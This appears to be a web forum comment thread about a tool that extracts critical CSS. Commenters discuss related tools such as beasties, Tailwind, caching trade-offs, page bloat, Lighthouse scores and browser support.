See also beasties ( https://github.com/danielroe/beasties ) formerly critters ( https://github.com/GoogleChromeLabs/critters ) which can be used to do this during SSR/SSG and is built into Nuxt and NextJS
Assuming you are using an atomic CSS based framework like tailwind, this would be unnecessary right ? Since all the CSS class names are anyways in-lined with the element.
Your page would still need the full CSS sheet loaded to render properly - tailwing classes do nothing on their own.
That said, if all of your css is referenced by html classes, it would be trivial to look at the html that's above the fold and derive which css you need to load first which could be kinda cool.
Seems to only work if the CSS is an external file.
(Not embedded within the HEAD/STYLE tag)
Why worry about this when companies pakage 10mb of javascript. Is this really where the problem is ?
I'm sad to say that the average is now 11MB.
Oh god, its 10% worse !
If a candy or soda can go from 50g sugar to 40g without a significant change in flavor, they definitely want to. They don't have to get to 5g for it to be worthwhile.
Wordpress plugins and builders like Divi and Elementor has been inserting all css for every page part or component anywhere in the body for years. I hate it. But, thas this critical css means they have beeing doing it right all along?
No, having an external file makes it cacheable locally. If every new page loads some of the same css again and again, it's a waste of bandwith. You should already have the stylesheet on your computer by then.
I often wonder if this bandwidth is as big a deal as people make it out to be.
On a very high traffic site, sure. Anything smaller and I’d argue you should just shove everything down the pipe in one request if you can.
If the bandwidth bothers you, delete an image. You likely don’t have anywhere near that amount in CSS to make up.
thank you.
anybody can tell me why I got two downvotes from my question?
Not working in Safari. Says ‘done’ but Generated CSS box remains empty
Does not work in IE11 either :(
> Better Lighthouse scores
What does that mean? What is Lighthouse?
https://developer.chrome.com/docs/lighthouse/overview
The performance audit in Chrome.
This comes in handy with the bloated codebase I am running from, bravo.
My problem is the codebase I am running towards. I am making headway with scoped CSS, however, Firefox does not have it yet. I keep checking in on Firefox to see when that is going to support scoped CSS but I have not been able to determine what the hold up is.
Does anyone have scoped CSS working with a workaround or compromise for Firefox?
[flagged]